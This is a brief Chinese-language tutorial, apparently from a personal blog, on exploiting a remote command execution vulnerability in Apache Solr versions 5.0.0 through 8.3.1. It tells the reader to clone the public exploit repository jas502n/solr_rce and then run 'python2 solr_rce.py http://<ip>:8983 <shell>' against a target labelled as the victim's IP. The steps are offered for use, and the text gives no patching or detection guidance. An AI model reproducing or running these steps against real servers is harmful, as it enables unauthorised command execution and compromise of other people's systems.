前言

通过jas502n/solr_rce实现Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983

漏洞利用前提

  • Apache Solr >= 5.0.0 <= 8.3.1

下载项目

1
2
git clone https://github.com/jas502n/solr_rce.git
cd solr_rce

漏洞利用

<ip>:受害者IP地址
<shell>:远程执行的Shell命令

1
python2 solr_rce.py http://<ip>:8983 <shell>

完成